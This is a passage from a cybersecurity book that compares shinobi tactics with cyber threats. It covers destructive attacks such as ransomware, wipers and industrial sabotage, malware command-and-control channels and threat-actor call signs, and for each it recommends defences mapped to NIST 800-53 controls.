tion. Like ninja fire attacks, ransomware is often used to distract from

bigger gambits. For example, adversaries (believed to be North Korean)

deployed the FEIB Hermes ransomware attack to divert cyber defenders’

attention while the attackers executed the SWIFT financial attack, which

netted them millions of dollars.9

Next came wiper malware attacks, in which the adversary plants “time

bomb” viruses in multiple systems to delete all system data and wipe backups

at a specified, opportune time. One example is the Shamoon virus, which

is believed to have been conducted by Iranian threat actors against Saudi

Arabia and was launched at the start of a weekend holiday to destroy data

and disable industrial oil systems.10

Recently, attackers have deployed sabotage malware against indus-

trial control systems, giving the attackers the capability to read sensors

or control mechanical switches, solenoid, or other physical actuators that

operate blast furnaces,11 electrical grids,12 anti–air defense systems,13 and

nuclear centrifuges.14 Such an attack could disable these critical systems

or cause them to malfunction, potentially leading to explosions, other

physical destruction, or simultaneous kinetic attacks.

134Chapter 17

Administrative efforts to prevent the spread of attacks include reduc-

ing the attack surface by hardening systems so that when systems are

attacked, fine-tuned security controls limit the damage. Also useful is

resiliency, in which multiple backups of systems and data in other loca-

tions and networks give organizations a fallback when a cyberattack suc-

cessfully compromises the primary systems. (Sometimes these backups

are even analog or manual systems.)

More technical defense solutions include placing firewalls on the perim-

eter of the network. However, if an attacker bypasses them, infiltrates the

network, and starts a self-propagating destructive attack, a firewall may let

the attack get outside of its network; in other words, firewalls are typically

designed to block incoming attacks, not outgoing attacks. Other efforts

to detect and stop destructive attacks include antivirus software, intrusion

prevention systems (IPS), host intrusion detection systems (HIDS), and

Group Policy Objects (GPO). Such technical safeguards might immediately

identify a destructive attack, respond to it, and neutralize it, but they are

typically signature based and therefore not always effective.

A newer approach is cyber insurance, which is an agreement that

protects an organization from the legal and financial fallout of a breach.

While such an insurance policy may mitigate an organization’s liability in

the case of a cyberattack, it does not defend against attacks, just like fire

insurance does not defend against flames.

Arguably the best option for defense against destructive attacks

includes strict network segregation and isolation (air gapping) to limit

resource access and prevent the spread of a self-propagating virus. While

this is an exceptionally effective way to block a cyberattack, it is not always

feasible given its potentially high impact on business functions. Also, it

can be bypassed by sneakernets and insider threats.

Safeguards from (Cyber) Fire Attacks

It is common for organizations to procure fire insurance and to pursue

fire prevention and containment strategies. However, for whatever rea-

son, some organizations purchase cyber insurance without implementing

safeguards against cyberattacks. It may be that they don’t see the same

level of risk from cyberattacks as from a real fire where, after all, property

and even human life are at stake. But with the growth of the Internet of

Things (IoT) and the increasing convergence of the physical world with

cyberspace, risks will only increase. Taking the following defensive mea-

sures may be immensely helpful to your organization:

1. Conduct cyber fire drills. Simulate destructive attacks to test

backups, failovers, responsiveness, recovery, and the ability to

Fire Attack135

“evacuate” data or systems in a timely fashion. This exercise

differs from disaster recovery or backup tests in that, rather than

an imagined threat scenario, an active simulated threat is inter-

acting with the network. (Take measures such as encrypting data

with a known key to ensure that you don’t destroy any data dur-

ing the exercises.)

Netflix runs a perpetual exercise called “Chaos Monkey”

that randomly disconnects servers, breaks configurations, and

turns off services. The organization is therefore constantly test-

ing that it can smoothly and immediately load balance or fail

over to backups without issue. In the event of a real problem,

the security team has already designed and tested workable

solutions. Netflix has released Chaos Monkey to the public

for free, so any organization can use it to improve the abil-

ity to detect, resist, respond to, and recover from destructive

attacks.15

2. (Cyber) fireproof systems. Dedicate resources to studying how a

selected destructive attack spreads, what it destroys, and what

makes your systems vulnerable to it. Implement read-only hard

drive adapters that conduct operations in the hard drive buffer,

keeping the data locked “behind glass” and incapable of being

destroyed because nothing can interact with it in its read-only

state. Remove the “combustible” software: applications, librar-

ies, functions, and other system components that are known to

spread destructive attacks.

A commercial opportunity exists to develop specialized soft-

ware, hardware, and devices that cyber fireproof systems. These

applications could have a large market impact by making servers

or data resistant to destructive attacks, or at least slowing or halt-

ing their progress.

3. Set cyber firetraps. There is a large market opportunity for creat-

,

ing automated denial and deception “cyber firetraps” that lure

adversaries or malicious programs into infinite loops or trigger

mechanisms that cause the attack to quarantine, extinguish, or

contain itself. One clever, publicly reported defense is to set up

folders on network shares with infinitely recursive directories;

when malware tries to iterate over folders to find more data, it

gets stuck in a never-ending loop.16 Specialized sensors could be

deployed to locate this behavior. They could then either alert

incident response teams or trigger a command to kill the process

that initiated the infinite directory.

136Chapter 17

4. Create dynamic cyber firebreak/cut lines. Cyberattacks spread so easily

because systems are typically powered on and connected to each

other. While an attack may not be able to directly compromise a

given system, it can spread to other, interconnected systems. This

is repeatedly demonstrated by the hundreds of thousands (if not

millions) of botnets, worms, and other self-spreading malware in

cyberspace.

While most network segregation and isolation happens

through statically designed architecture, IT organizations can

implement additional manual and software-based “break” lines.

Some organizations have been known to install a master solenoid

switch that manually disconnects the organization from the inter-

net. Internal intranet communications continue, but all external

network connections immediately disconnect, creating a physi-

cal air gap. The need for this capability might seem extreme or

unlikely, but in the event of a global “cyber fire,” the organization

has the option to quickly and easily break away from the threat

without using a fire axe to sever cables.

A twist on this implementation would see every system, room,

floor, and building with its own master switch, allowing security

staff to make quick decisions that thwart destructive attacks.

Upon hearing of an attack from leadership, staff could quickly

download any critical work documents and then flip their switch,

segregating their computer from the network and preventing the

spread of the attack.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . You spend large parts of your fortune fireproofing

your castle . You build it from stone, fortify it with all the newest fire defense

technologies, and train your guards in how to respond to a fire .

In what ways are you still vulnerable to fire attack? For instance, how

might you protect or move your gunpowder stores? Could you isolate them

while satisfying your military advisers, who say that your army cannot defend

the castle without ready access to gunpowder? How would you fireproof

your food stores without ruining the food? How might you sanitize or filter

goods moving through your castle to prevent the circulation of combustible

materials? Where would you create firebreaks in your camps, barracks,

and other areas of the castle? What firetraps could you design to contain or

Fire Attack137

extinguish a spreading fire or to catch the arsonist? Can you design a fire

drill exercise that uses real fire to train your soldiers, but without exposing

your castle to risk?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of fire attacks in mind.

1. Monitor for indicators of destructive actions within your orga-

nization. Prevent tampering of system-monitoring logs, audit

events, and sensor data by forwarding data to segmented event

collectors. [AU-6: Audit Review, Analysis, and Reporting | (7)

Permitted Actions; AU-9: Protection of Audit Information; SI-4:

System Monitoring]

2. Implement network, system, and process segregation/isolation to

reduce the ability of destructive attacks to spread across your net-

work. [CA-3: System Interconnections; SC-3: Security Function

Isolation; SC-7: Boundary Protection | (21) Isolation of System

Components; SC-11: Trusted Path | (1) Logical Isolation; SC-39:

Process Isolation]

3. Conduct backup tests and resiliency exercises to determine

whether recovery mechanisms and fail-safes work as expected.

[CP-9: System Backup | (1) Testing for Reliability and Integrity |

(2) Test Restoration Using Sampling; CP-10: System Recovery and

Reconstitution | (1) Contingency Plan Testing]

4. Require dual authorization from qualified, authorized individu-

als before allowing commands that delete or destroy data. [CP-9:

System Backup | (7) Dual Authorization]

5. Implement measures to maintain your organization’s security

in the event of a destructive attack that causes security systems

to fail. For instance, configure firewalls that go offline to block

everything rather than allow everything, or configure systems

to go into “safe mode” when an attack is detected. [CP-12: Safe

Mode; SC-24: Fail in Known State]

6. Maintain media transport mechanisms that are safeguarded

against destructive attacks. For example, ensure that a hard drive

138Chapter 17

containing sensitive data is kept offline, disconnected, and stored

in a secure place where a physically destructive attack, such as

a real fire, could not compromise it. [MP-5: Media Transport;

PE-18: Location of System Components; SC-28: Protection of

Information at Rest]

7. Before connecting portable media or devices to your organiza-

tion’s systems or networks, test and scan them for evidence of

malicious software. [MP-6: Media Sanitization; SC-41: Port and

I/O Device Access]

8. Conduct risk assessments to determine which data and sys-

tems, if compromised, would most harm your organization.

Take advanced precautions with and install special safeguards

on those systems and data. [RA-3: Risk Assessment; SA-20:

Customized Development of Critical Components]

9. Build defenses such as malicious code protections and detonation

chambers to look for evidence of destructive attack capabilities.

[SC-44: Detonation Chambers; SI-3: Malicious Code Protection]

Debrief

In this chapter, we reviewed fire attacks and the various techniques shi-

nobi used to secretly carry flames and weaponize fire. We looked at sev-

eral high-profile cyberattacks, along with ways to defend against them.

We also looked more generally at ways in which cyber threats act like the

digital twin of fire attacks.

In the next chapter, we will discuss in detail how shinobi would com-

municate and coordinate with external allies to start a fire attack. Shinobi

accomplished covert command and control (C2) communication in a

multitude of clever ways—ways that parallel methods some malware uses

to perform C2 communication.

18

C O V E R T C O M M U N I C A T I O N

When a shinobi is going to communicate with the general after he has

gotten into the enemy’s castle, the shinobi needs to let his allies know

where he is. It is essential to arrange for the time and place to do this.

For success on a night attack, send shinobi in advance to know

the details of the enemy’s position before you give your orders.

—Yoshimori Hyakushu #12

Because shinobi were first and foremost experts in espio-

nage, they had to safely relay secret messages containing

scouting reports, attack plans, and other critical informa-

tion to help their lords and allies make informed tactical

and strategic decisions. Similarly, lords, generals, and

other shinobi needed to covertly tell an infiltrated shinobi

when to set a fire or execute other tactics. These messages

had to be easily deciphered by the recipient shinobi but

indiscernible to everyone else.

The Bansenshūkai, Ninpiden, and Gunpo Jiyoshu scrolls all describe

secret methods shinobi used to communicate with other shinobi, friendly

140Chapter 18

armies, or their employers after infiltrating enemy territory. Some are

brutally simple. The Bansenshūkai

,

describes hiding a message in the belly

of a fish or even inside a person (use your imagination) who can easily

travel across borders without suspicion. Common choices were monks and

beggars. Obfuscation techniques discussed in the same scroll include cut-

ting a message into several pieces and sending each piece by a different

courier, to be reassembled by the recipient, as well as making inks from

tangerine juice, rusty water, sake, or castor oil that dry invisibly on paper

but are revealed with fire. Shinobi even developed the shinobi iroha—a

custom alphabet indecipherable to non-shinobi—and used fragmented

words or characters to create contextual ambiguity that only the shinobi

meant to receive the message would understand.1

A popular—and direct—method of sending secret messages was

yabumi, wherein what appears to be a normal arrow actually has a secret

scroll rolled around the bamboo shaft, along with marks on the fletch-

ing to identify the recipient. Given the logistical realities of feudal Japan,

shinobi could not always guarantee that they could fire a yabumi arrow at

a prearranged time and place, so they developed an arrow “handshake”

that, to an outsider, might have looked like a skirmish. If one side saw a

specific number of arrows shot rapidly at the same spot, they returned

fire with a specific number of arrows aimed to land in front of the

shooter. This signal and countersignal established a friendly connection.

The shinobi could then shoot the yabumi arrow, which would be picked

up and delivered to the intended target.2 This method of communica-

tion became so common that the Gunpo Jiyoshu manual warns that the

enemy may send deceptive letters by arrow; thus, the recipient should

closely examine yabumi messages using some of the linguistic techniques

described earlier in this book.3

For long-distance signaling or when sending a scroll wasn’t feasible,

shinobi devised flag, fire, smoke, and lamp signals (hikyakubi). When even

these were not possible, they employed secret drums, gongs, and conches.

A loud, unique blast of the signaling device told the shinobi inside enemy

lines to prepare to receive a secret communication. The exact signal pat-

tern was agreed upon one to six days before infiltration to avoid confu-

sion. After the initial hikyakubi signal, the message was delivered through

drum, gong, or conch signals.4

In this chapter, we will look at how the covert communication meth-

ods of the shinobi closely resemble modern malware command and

control communication. We will discuss why command and control com-

munications are needed and their role in threat activity. We’ll touch on

various techniques that modern adversaries have used to covertly conduct

Covert Communication141

this communication. We will also explore various defenses against this

technique and the challenges of using it. Lastly, we’ll list a large collec-

tion of security best practices to defend against command and control

communications. The fact that the shinobi scrolls offer no guidance

around how to stop covert communication suggests there may not be a

good solution for it.

Command and Control Communication

It is typically not feasible for malware to be wholly independent and

autonomous. If it were, the malware would be exceedingly large, complex,

suspicious, and visible to defenders. Rather, most malware needs tactical

guidance from its controllers during a threat campaign, so threat actors

use a technique called command and control (abbreviated as C2, CnC, or

C&C) to communicate with malware, backdoors, implants, and compro-

mised systems under their control in target networks. Operators use C2

communication to send commands to a compromised system, prompting

it to execute actions such as downloading data, updating its configura-

tion, or even deleting itself. The C2 implant can also initiate communica-

tion by sending statistics or valuable files, asking for new commands, or

beaconing back to report that the system is online, along with its location

and current status. Cyber threat actors often establish C2 infrastruc-

ture such as domain names, IPs, and websites one to six weeks prior to

infiltration.

C2 functionality is widely known, and many firewalls, IDS/IPS, and

other security devices and controls can prevent adversaries from com-

municating directly to target systems or vice versa. To bypass these con-

trols, threat actors continually develop more advanced C2 techniques,

tactics, and procedures (TTPs). For example, C2 data can be embed-

ded in the payload of a ping or in commands hidden in pictures hosted

on public websites. Adversaries have used C2 in Twitter feeds and com-

ments on trusted sites. They have also used C2 to establish proxies and

email relays on compromised systems; they then communicate over

known protocols and safe sites that are not blocked by security controls

and devices. Phones plugged into compromised systems can be infected

with malware that, upon USB connection, “calls” the C2 via cell phone

towers, bypassing firewalls and other network defenses and facilitat-

ing communication between the infected host and the C2 while the

phone’s battery charges. Some C2 communication methods use blink-

ing LEDs (like a signal fire), vary CPU temperature (like a smoke sig-

nal), use the sounds of hard drives or PC speakers (like signal drums),

142Chapter 18

and leverage electromagnetic spectrum waves to bypass the air gap to a

nearby machine.

Threat actors layer C2 communications with obfuscation, encryption,

and other confidentiality techniques to maintain contact with a compro-

mised system without disclosing evidence of the commands to the victims.

Adversaries may avoid detection by:

• Limiting the amount of data that is communicated on a daily

basis so the daily amount never seems anomalous (for example,

100MB max per day to mask downloading 1.5TB over two weeks)

• Sending or receiving beacons only during active user time to

blend in with legitimate user traffic (for example, not beacon-

ing very often in the small hours of the morning on a Sunday or

holiday)

• Rotating to new, random, or dynamic C2 points to avoid statisti-

cal anomalies

• Regularly generating pseudo-legitimate traffic to avoid scrutiny

from behavior analysis

• Disabling or deleting activity logs to hide from forensics

Advanced C2 TTPs can be particularly sinister, virtually undetect-

able, and hard to block. Consider the example of a Windows IT admin

who has implemented such strict firewall controls that the only site they

can visit is technet.microsoft.com, the official Microsoft web portal for IT

professionals. Only the HTTPS protocol is allowed, antivirus is current

and running, and the operating system is fully patched. No external pro-

grams such as email, Skype, or iTunes are running, with the exception of

the Microsoft TechNet website, which the admin needs to do their job.

That may sound secure, but consider that Chinese APT17 (also called

Deputy Dog or Aurora Panda) encoded hidden IP addresses in comments

posted on Microsoft TechNet pages—comments that communicated with

a BLACKCOFFEE remote access trojan on a compromised system.5 If

anyone had inspected proxy traffic, behavior analysis, anomaly heuristics,

IDS signatures, antivirus, or firewall alerts, nothing notable would have

indicated that malicious communications were happening.

Advanced defense efforts to counter sophisticated C2s typically

involve air gapping the systems, but new C2 communication techniques

have been developed in recent years. One example is using a USB loaded

with rootkits or compromised firmware and malware that, once plugged

into a system, initiate communications with the implant on the compro-

mised system, collect the packaged data, and discreetly upload it for exfil-

tration to an external C2.

Covert Communication143

Controlling Coms

It is common for organizations to subscribe to multiple threat indicator

,

feeds. These feeds continually supply the organization with malicious

URLs, IPs, and domains that have been observed working as C2s. The

organization will then alert and/or block those threats in their firewalls

and security devices. This is a good starting point for defending against

C2s, but there is an endless supply of new URLs, IPs, and domains, allow-

ing threat actors to take up new identities and evade the threat indicator

feeds. Both old and new approaches are needed to address C2s, some of

which are suggested below.

1. Follow best practices. While it may be impractical or even impossible

to prevent all C2 communications, you can block basic or moder-

ately advanced C2s by implementing cybersecurity best practices:

know your network, set boundary and flow controls, establish

whitelists, and authorize hunt teams to proactively block or inter-

cept C2 communications. Do not take shortcuts on best practices.

Rather, commit to doing solid security work. Document, test, and

validate your best practices and consult with independent third-

party assessors for additional measures and validation. Invest in

improving security while maintaining and bettering your existing

best-practice infrastructure.

2. Implement segmentation with “remote viewing” controls. Network seg-

mentation and isolation means establishing multiple networks

and machines, such as an intranet machine and an unclassi-

fied internet machine that are segmented from each other.

Segmentation should prevent C2 communication from bridg-

ing across boundaries. Unfortunately, it’s common for users to

briefly plug their intranet machine into the internet to download

documents or libraries or commit some other breach of security

protocol. One approach to such issues is to configure the intranet

machine so it remotely views another isolated machine that is

connected to the internet. The isolated internet box is not physi-

cally or directly accessible by users; they may issue commands and

view the screen, but they do not receive the actual raw informa-

tion from the isolated internet box in their remote viewing box.

The remote viewing box is effectively a TV monitor displaying

another computer in a different room. As such, C2 communica-

tion, malware, and exploits cannot jump through the video signal

to cause harm.

144Chapter 18

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . Every week, your scribes produce new scrolls that

outline state secrets, new research and discoveries, financial data, and other

sensitive information . It is imperative that these scrolls not end up in enemy

hands . However, there are rumors that someone is making copies of impor-

tant scrolls in your private library, and recent enemy actions seem to confirm

these reports . None of the scribes or archivists are suspected of copying and

exfiltrating the scrolls, so you are not looking for an insider threat .

What access restrictions or physical protections could you place on

the scrolls to prevent their exfiltration or reproduction? How could you moni-

tor for the theft or removal of these scrolls while still permitting the normal

transit of goods and people to and from your castle? Could you store your

scrolls in such a way that the enemy would not know which scrolls have

the most value? What other ways might a threat actor obtain access to the

scrolls—or steal the information without access—and how would you defend

againstthem?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of C2s in mind.

1. Implement safeguards on systems, network boundaries, and

network egress points that look for signs of data exfiltration on

your network. This could mean blocking encrypted tunnels that

your sensors cannot intercept, along with looking for evidence

of unauthorized protocols, data formats, data watermarks, sensi-

tive data labels, and large files or streams exiting your network.

[AC-4: Information Flow Enforcement | (4) Content Check

Encrypted Information; SC-7: Boundary Protection | (10) Prevent

Exfiltration; SI-4: System Monitoring | (10) Visibility of Encrypted

Communications]

2. Establish multiple networks with isolation and segmenta-

tion between internet and intranet resources. Restrict criti-

cal internal systems from connecting to the internet. [AC-4:

Information Flow Enforcement | (21) Physical and Logical

Covert Communication145

Separation of Information Flows; CA-3: System Interconnections

| (1) Unclassified National Security System Connections | (2)

Classified National Security System Connections | (5) Restrictions

on External System Connections; SC-7: Boundary Protection |

(1) Physically Separated Subnetworks | (11) Restrict Incoming

Communications Traffic | (22) Separate Subnets for Connecting

to Different Security Domains]

3. Restrict remote access to any systems with critical information.

[AC-17: Remote Access]

4. Implement restrictions and configuration controls to detect and

prevent unauthorized wireless communications. [AC-18: Wireless

Access | (2) Monitoring Unauthorized Connections; PE-19:

Information Leakage; SC-31: Covert Channel Analysis; SC-40:

Wireless Link Protection; SI-4: System Monitoring | (15) Wireless

to Wireline Communications]

5. Train your security team and employees to identify C2 com-

munications. [AT-3: Role-based Training | (4) Suspicious

Communications and Anomalous System Behavior; SI-4: System

Monitoring | (11) Analyze Communications Traffic Anomalies |

(13) Analyze Traffic and Event Patterns | (18) Analyze Traffic

and Covert Exfiltration]

6. Deny any unauthorized software that could be a C2 backdoor or

implant from running on your systems. [CM-7: Least Functionality

| (5) Authorized Software–Whitelisting]

7. Safeguard direct physical connections to systems that bypass

security controls and boundaries; these include switch closets,

Ethernet wall jacks, and computer interfaces. [PE-6: Monitoring

Physical Access; SC-7: Boundary Protection | (14) Protects Against

Unauthorized Physical Connections | (19) Block communication

from non-organizationally configured hosts]

8. Require inspection and scanning of removable media that enters

or leaves your organization to prevent personnel from manually

performing C2 communication through delivery and removal of

external media. [PE-16: Delivery and Removal]

9. Implement a whitelist to deny communication to any resource

or address that has not been approved for an exception. Many

C2 sites are brand-new domains with no history of legitimate use

by your organization. [SC-7: Boundary Protection | (5) Deny by

Default—Allow by Exception]

146Chapter 18

Debrief

In this chapter, we reviewed the various communication methods shi-

nobi used to receive and send commands to allies. We described various

modern C2 methods, along with their comparative shinobi methods.

However, we only scratched the surface, as it’s very likely that the most

sophisticated C2 techniques have yet to be discovered. Just like the best

of the shinobi’s covert communication methods were never written

down, we may never learn of the genius and creativity behind the most

advanced C2 techniques. We discussed several best practices, including

whitelisting and encryption inspection, as ways to mitigate an adversary’s

C2s, but an ideal solution to the problem remains to be found.

In the next chapter, we will discuss shinobi call signs. These were

methods of communicating with allies inside enemy territory by leaving

unique marks or messages. Similar to a dead drop, call signs never leave

the boundaries of an environment, so traditional methods of blocking or

detecting C2 communication generally do not work against them.

19

C A L L S I G N S

When you steal in, the

,

first thing you should do is mark

the route, showing allies the exit and how to escape.

After you have slipped into the enemy’s area successfully, give more

attention to not accidentally fighting yourselves than to the enemy.

—Yoshimori Hyakushu #26

While shinobi are often portrayed in popular culture as

lone actors, many shinobi worked in teams. These teams

were particularly adept at discretely relaying informa-

tion to each other in the field. The Gunpo Jiyoshu manual

describes three call signs, or physical markers, that the

shinobi developed to communicate with each other with-

out arousing suspicion. Based on what the markers were

and where they were placed, call signs helped shinobi

identify a target, marked which path they should take at a

fork in the road, provided directions to an enemy stronghold, or coordi-

nated an attack, among other actions. Though call signs were well known

within shinobi circles, participating shinobi agreed to custom variations

prior to a mission to ensure that targets or even enemy shinobi could not

148Chapter 19

recognize the call signs in the field. The scrolls suggest using markers

that are portable, disposable, quick to deploy and retract, and placed at

ground level. Most importantly, the markers had to be visually unique yet

unremarkable to the uninitiated.

For example, a shinobi might agree to inform their fellow shinobi

of their whereabouts by leaving dyed grains of rice in a predetermined,

seemingly innocuous location. One shinobi would leave red rice, another

green, and so on, so that when a fellow shinobi saw those few colored

grains, they would know their ally had already passed through. The

beauty of the system was that, while the shinobi could quickly identify

these items, ordinary passersby would not notice a few oddly colored

grains of rice. Using similar methods, the shinobi could subtly point a

piece of broken bamboo to direct an ally toward a chosen footpath, or

they could leave a small piece of paper on the ground to identify a dwell-

ing that would be burned down, lessening the chance that team members

would find themselves either victims or suspects of arson.1

In this chapter, we will explore the ways that call sign techniques

could be used in networked environments and why cyber threat actors

might use them. We will hypothesize where in the network call signs

could be placed and what they might look like. In addition, we will dis-

cuss how one could hunt for these call signs in a target network. We will

review the challenge of detecting creative call signs and touch on the

crux of this challenge: controlling and monitoring your environment for

an adversary’s actions. You will get a chance, in the thought exercise, to

build up mental models and solutions to deal with the challenge of enemy

call signs. You will also be exposed to security controls that may prevent

threat actors from using call signs in your environment, as well as limit

their capabilities.

Operator Tradecraft

During the Democratic National Committee hack of 2016, the Russian

military agency GRU (also known as APT28 or FANCYBEAR) and its

allied security agency FSB (APT29 or COZYBEAR) were operating on

the same network and systems, but they failed to use call signs to com-

municate with each other. This oversight resulted in duplication of effort

and the creation of observables, anomalies, and other indicators of com-

promise in the victim’s network, likely contributing to the failure of both

operations.2 The lack of communication, which probably stemmed from

compartmentalization between the two intelligence organizations, gives

us a sense of what cyber espionage threat groups could learn from the

shinobi.

Call Signs149

While the cybersecurity community has not yet observed overlap-

ping threat groups using covert markers, the DNC hack demonstrates the

need for such a protocol to exist. It’s reasonable to assume that the GRU

and FSB performed an after-action report of their DNC hack tradecraft

efforts, and they may already have decided to implement a call sign proto-

col in future operations where target overlap is a concern. If cyber espio-

nage organizations begin to work regularly in insulated but intersecting

formations, they will need a way to communicate various information,

including simply their presence on systems and networks and details

about their targets, when using normal communication channels is not

possible.

If these call signs did exist, what would they look like? Effective cyber

call signs would most likely:

• Change over time, as shinobi markers did

• Be implemented in tools and malwares that cannot be captured

and reverse engineered. Humans using keyboards would be

needed to identify them.

• Exist in a location that the overlapping espionage group would

surely find, such as the valuable and unique primary domain

controller (DC). Given the presence of file security monitors and

the operational reality that DCs do not restart very often, a threat

group might place the marker in the DC’s memory to maximize

its persistence and minimize its detectability.

It remains unclear what kind of strings or unique hex bytes could

function as markers; in what cache, temporary table, or memory location

markers could reside; and how another operator could easily discover

them. Note, however, that the cybersecurity industry has observed mul-

tiple malware families that leave specific files or registry keys as a signal

to future copies of the virus that the infection has already successfully

spread to a given machine (and thus that they need not attempt to infect

it again).3 Though this call sign functionality could not be implemented

as easily against dynamic human threat actors, defenders could create

files and registry keys that falsely signal infection, prompting malware to

move on innocuously.

Detecting the Presence of Call Signs

Many organizations struggle to identify which user deleted a file from a

shared network drive, let alone to detect covert call signs hidden inside

remote parts of a system. Nonetheless, defenders will increasingly need

to be able to defend against threats that communicate with each other,

150Chapter 19

inside the defender’s environment. To have a chance of catching threat

actors, defenders will need training, and they will need to implement

detection tools and have host visibility.

1. Implement advanced memory monitoring. Identify high-value sys-

tems in your network—systems that you believe a threat actor

would target or need to access to move onward to a target. Then,

explore the existing capabilities of your organization to monitor

and restrict memory changes on these systems. Look at products

and services offered by vendors as well. Evaluate the amount of

effort and time that would be necessary to investigate the source

of such memory changes. Finally, determine whether you could

confidently identify whether those changes indicated that the tar-

get machines had been compromised.

2. Train your personnel. Train your security, hunt, and IT teams to

consider forensic artifacts in memory as potential indictors of

compromise, especially when these are found in high-value tar-

gets, rather than dismissing any incongruities they find.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . You receive reliable intelligence that teams of shinobi

are targeting your castle and that they are using call signs to communicate

with each other . Their covert signals include placing discreet markers on the

ground, including dyed rice, flour, and broken bamboo .

How would you train your guards to be aware of these techniques—and

of techniques you have not yet considered? How could you help them man-

age the false alerts likely to occur when your own people accidentally drop

rice on the ground or when animals and wind disturb the environment?

,

What

architectural changes could you make to your castle and the grounds to more

easily detect secret markers? What countermeasures would destroy, disrupt,

or degrade the ability of these markers to communicate or deceive the shi-

nobi who are sending and receiving the signals?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of call signs in mind.

Call Signs151

1. Ensure that prior user information is unavailable to current

users who obtain access to the same system or resources. [SC-4:

Information in Shared Resources]

2. Identify system communications that could be used for unauthor-

ized information flows. A good example of a potential covert

channel comes from control “PE-8: Visitor Access Records.” Paper

log books or unrestricted digital devices that visitors use to sign

in to facilities could be vulnerable to information markers that

signal to compartmentalized espionage actors that other teams

have visited the location. [SC-31: Covert Channel Analysis]

3. Search for indicators of potential attacks and unauthorized

system use and deploy monitoring devices to track information

transactions of interest. [SI-4: System Monitoring]

4. Protect system memory from unauthorized changes. [SI-16:

Memory Protection]

Debrief

In this chapter, we reviewed the physical markers shinobi teams used to

signal to each other inside enemy territory. We learned why these call

signs were useful and the characteristics of good call signs according to

the scrolls. We then reviewed a cyber espionage operation where a lack

of call signs and the resulting uncoordination contributed to revealing

threat group activity. We discussed how modern threat groups will likely

continue to gain sophistication—a sophistication that may include adopt-

ing call sign techniques. We explored what modern digital call signs

could look like as well as how we might notice them.

In the following chapter, we will discuss the opposite of shinobi call

signs: precautions that shinobi took to leave no trace of their activity

inside enemy territory, as the scrolls instructed. Advanced techniques

included creating false signals intended to deceive the defender.

20

L I G H T, N O I S E , A N D

L I T T E R D I S C I P L I N E

The traditions of the ancient shinobi say you should lock the

doors before you have a look at the enemy with fire.

If you have to steal in as a shinobi when it is snowing, the first

thing you must be careful about is your footsteps.

—Yoshimori Hyakushu #53

Avoiding unwanted attention was a core discipline of their

trade, and shinobi trained diligently on being stealthy. If

lanterns emitted light that disturbed animals, footsteps

echoed and woke a sleeping target, or food waste alerted

a guard to the presence of an intruder, then a shinobi put

their mission—if not their life—in jeopardy. As such, the

scrolls provide substantial guidance around moving and

operating tactically while maintaining light, noise, and lit-

ter discipline.

Light discipline includes general tactics. For example, the scrolls

recommend that infiltrating shinobi lock a door from the inside before

igniting a torch to prevent the light (and any people in the room) from

154Chapter 20

escaping.1 It also includes specific techniques. Bansenshūkai details a num-

ber of clever tools for light management, such as the torinoko fire egg. This

is a bundle of special flammable material with an ember at the center,

compressed to the shape and size of an egg. The egg rests in the shinobi’s

palm such that opening or closing the hand controls the amount of oxy-

gen that reaches the ember, brightening or dimming the light and allow-

ing the carrier to direct the light in specific, narrow directions.2 With

this tool, a shinobi could quickly open their hand to see who was sleeping

inside a room, then instantly extinguish the light by making a tight fist.

Thus, the fire egg has the same on-demand directional and on/off light

control as a modern tactical flashlight.

Silence was critical for shinobi, and the scrolls describe an array of

techniques to remain quiet while infiltrating a target. The Ninpiden sug-

gests biting down on a strip of paper to dampen the sound of breathing.

Similarly, some shinobi moved through close quarters by grabbing the

soles of their feet with the palms of their hands, then walking on their

hands to mute the sound of footsteps. This technique must have required

considerable practice and conditioning to execute successfully. It was also

common for shinobi to carry oil or other viscous substances to grease

creaky gate hinges or wooden sliding doors—anything that might squeak

and alert people to their presence. The scrolls also warn against applying

these liquids too liberally, as they could visibly pool, tipping off a guard to

the fact that someone had trespassed.3

Not all shinobi noise discipline techniques minimized noise. The

scrolls also provide guidance for creating a purposeful ruckus. Shōninki

describes a noise discipline technique called kutsukae, or “changing your

footwear,” which actually involves varying your footsteps rather than put-

ting on different shoes. An infiltrating shinobi can shuffle, skip, fake

a limp, take choppy steps, or make audible but distinct footstep noises

to deceive anyone listening. Then, when they change to their natural

gait, listeners assume they’re hearing a different person or erroneously

believe that the person they’re tracking suddenly stopped.4 The Ninpiden

describes clapping wooden blocks together or yelling “Thief!” or “Help!”

to simulate an alarm, testing the guards’ reaction to noise.5 Bansenshūkai

describes a more controlled noise test, in which a shinobi near a target or

guard whispers progressively more loudly to determine the target’s noise

detection threshold. Noise tests help shinobi make specific observations

about how the target responds, including:

• How quickly did the target react?

• Was there debate between guards about hearing a noise?

• Did guards emerge quickly and alertly, with weapons in hand?

Light, Noise, and LitterDiscipline155

• Did the noise seem to catch the target off guard?

• Was the target completely oblivious?

These observations not only tell the shinobi how keen the target’s

awareness and hearing are but also reveal the target’s skill and prepara-

tion in responding to events—information the shinobi can use to tailor

the infiltration.6

In terms of physical evidence, shinobi used “leave no trace” long

before it was an environmental mantra. A tool called nagabukuro (or “long

bag”) helps with both sound and litter containment. When shinobi scaled

a high wall and needed to cut a hole to crawl through, they hung the

large, thick, leather nagabukuro bag lined with fur or felt beneath them

to catch debris falling from the wall and muffle the sound. The shinobi

could then lower the scraps quietly to a discreet place on the ground

below. This was much better option than letting debris crash to the

ground or splash into a moat.7

In this chapter, we abstract the light, noise, and litter of shinobi infil-

trators into their cyber threat equivalents. We will review some tools and

techniques that threat groups have used to minimize the evidence they

leave behind, as well as some procedural tradecraft disciplines. We’ll dis-

cuss the topic of detecting “low and slow” threats, along with modifying

your environment so it works to your advantage. The thought exercise will

look at a technique used by shinobi to mask their footsteps that could in

theory be applied to modern digital systems. At the end of the chapter,

we’ll cover detection discipline as a way to counter a sophisticated adver-

